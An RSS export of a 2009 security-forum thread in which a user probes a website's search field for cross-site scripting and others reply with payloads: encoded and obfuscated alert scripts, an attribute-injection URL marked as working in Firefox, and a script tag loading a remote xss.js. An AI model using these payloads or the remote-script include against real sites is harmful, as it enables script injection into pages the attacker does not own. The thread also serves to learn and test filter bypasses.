<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Help! Website with XSS bug changes my input</title>
        <description>Hello guys,

There is a website with a search field at the index page.

When i enter &amp;lt;script&amp;gt;alert(&amp;quot;test&amp;quot;);&amp;lt;/script&amp;gt; in the search field there comes a pop-up which says: &amp;quot;best&amp;quot; instead of &amp;quot;test&amp;quot;.


When I enter &amp;lt;script&amp;gt;alert(&amp;quot;test123&amp;quot;);&amp;lt;/script&amp;gt; the website says: &amp;quot;test&amp;quot; instead of &amp;quot;test123&amp;quot;

What does this mean? isn't this website vulnerable to XSS or something?</description>
        <link>http://sla.ckers.org/forum/read.php?2,31708,31708#msg-31708</link>
        <lastBuildDate>Tue, 18 Jun 2013 22:54:43 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,32262#msg-32262</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,32262#msg-32262</link>
            <description><![CDATA[k that was strange i know i replied to the PM...]]></description>
            <dc:creator>PaPPy</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 11 Nov 2009 06:14:21 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,32257#msg-32257</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,32257#msg-32257</link>
            <description><![CDATA[Wrong place for replay pappy <br />
<br />
http://sla.ckers.org/forum/read.php?2,31936<br />
<br />
<br />
please remove MySite link <br />
thank you]]></description>
            <dc:creator>mjmjmj</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 10 Nov 2009 21:28:42 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,32230#msg-32230</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,32230#msg-32230</link>
            <description><![CDATA[change hxxp to http<br />
hxxps://victim/?UserN=&quot; onmouseover=&quot;alert(1)&quot; style=&quot;display:block; width:500px; height:500px;<br />
<br />
<br />
works in firefox]]></description>
            <dc:creator>PaPPy</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 09 Nov 2009 16:16:07 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,31749#msg-31749</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,31749#msg-31749</link>
            <description><![CDATA[&lt;script src=hxxp://ha.ckers.org/xss.js&gt;&lt;/script&gt;<br />
replace XX with tt]]></description>
            <dc:creator>PaPPy</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 06 Oct 2009 15:14:17 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,31748#msg-31748</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,31748#msg-31748</link>
            <description><![CDATA[No I dont think so, how can I do that, and how does that work?]]></description>
            <dc:creator>Hanna313</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 06 Oct 2009 15:09:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,31747#msg-31747</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,31747#msg-31747</link>
            <description><![CDATA[have u tried including a remote script?]]></description>
            <dc:creator>PaPPy</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 06 Oct 2009 15:00:02 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,31746#msg-31746</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,31746#msg-31746</link>
            <description><![CDATA[None of the input is working.<br />
<br />
I tried Extraneous open brackets: &lt;&lt;SCRIPT&gt;alert('test');//&lt;&lt;/SCRIPT&gt;<br />
<br />
and this one first shows one pop-up saying: &quot;best&quot; and the next one saying &quot;test&quot;.<br />
<br />
So i am improving but how can I optimize this query, so I only get one -pop-up saying: &quot;test&quot;]]></description>
            <dc:creator>Hanna313</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 06 Oct 2009 14:58:02 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,31738#msg-31738</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,31738#msg-31738</link>
            <description><![CDATA[I just couldn't resist.....<br />
<br />
&lt;script&gt;alert(String.fromCharCode(116,101,115,116));&lt;/script&gt;<br />
&lt;script&gt;alert(&quot;\x74\x65\x73\x74&quot;);&lt;/script&gt;<br />
&lt;script&gt;alert(&quot;\u0074\u0065\u0073\u0074&quot;);&lt;/script&gt;<br />
&lt;script&gt;alert(&quot;\164\145\163\164&quot;);&lt;/script&gt;<br />
&lt;script&gt;alert(&quot;&amp;#65364;&amp;#65349;&amp;#65363;&amp;#65364;&quot;);&lt;/script&gt;&lt;!-- slackers needs UTF-8 this won't display correctly :P --&gt;<br />
&lt;script&gt;alert(&quot;test&quot;);&lt;/script&gt;<br />
&lt;script&gt;_=-~-~[],$=-~_,____=_&lt;&lt;_,__=____+~[];________=($-$)[________________=(''+{})[_+$]+(''+{})[$-_]+([].$+'')[$-_]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-_]+(!''+'')[_]+(''+{})[_+$]+({}+'')[$+$]+(''+{})[$-_]+(!''+'')[$-_]][________________];alert(________(________((!''+'')[$-_]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[_]+((!''+''))[$-_]+([].$+'')[$-_]+'\''+''+'\\'+($-_)+($+$)+(_)+'\\'+($-_)+(_+_)+(_+$)+'\\'+($-_)+($+$)+(_+_)+'\\'+($-_)+($+$)+(_+$)+'\\'+($-_)+($+$)+(_)+'\\'+($-_)+(_+$)+($+$)+'\\'+(_+_)+($-$)+'\\'+(_+_)+(_)+'\\'+($-_)+($+$)+(_+_)+'\\'+($-_)+(_+_)+(_+$)+'\\'+($-_)+($+$)+($)+'\\'+($-_)+($+$)+(_+_)+'\\'+(_+_)+(_)+'\'')())())&lt;/script&gt;]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 06 Oct 2009 10:05:13 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,31736#msg-31736</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,31736#msg-31736</link>
            <description><![CDATA[maybe try String.fromCharCode]]></description>
            <dc:creator>PaPPy</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 06 Oct 2009 07:20:45 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,31734#msg-31734</guid>
            <title>Re: Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,31734#msg-31734</link>
            <description><![CDATA[I found out what happens:<br />
<br />
when I enter: &lt;script&gt;alert(&quot;test&quot;);&lt;/script&gt; in the searchfield a pop-up shows up saying &quot;best&quot;.<br />
<br />
What happens is that for some reason the pop-up contains the alternative searchword.<br />
<br />
Another example: when I search for: &lt;script&gt;alert(&quot;doggy&quot;);&lt;/script&gt; the pop-up shows up saying &quot;dog&quot;, because it took the alternative searchword.<br />
<br />
What can I do to prevent this and make the pop-up say what I enter as input?]]></description>
            <dc:creator>Hanna313</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 06 Oct 2009 05:20:36 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,31708,31708#msg-31708</guid>
            <title>Help! Website with XSS bug changes my input</title>
            <link>http://sla.ckers.org/forum/read.php?2,31708,31708#msg-31708</link>
            <description><![CDATA[Hello guys,<br />
<br />
There is a website with a search field at the index page.<br />
<br />
When i enter &lt;script&gt;alert(&quot;test&quot;);&lt;/script&gt; in the search field there comes a pop-up which says: &quot;best&quot; instead of &quot;test&quot;.<br />
<br />
<br />
When I enter &lt;script&gt;alert(&quot;test123&quot;);&lt;/script&gt; the website says: &quot;test&quot; instead of &quot;test123&quot;<br />
<br />
What does this mean? isn't this website vulnerable to XSS or something?]]></description>
            <dc:creator>Hanna313</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 02 Oct 2009 17:42:38 -0500</pubDate>
        </item>
    </channel>
</rss>
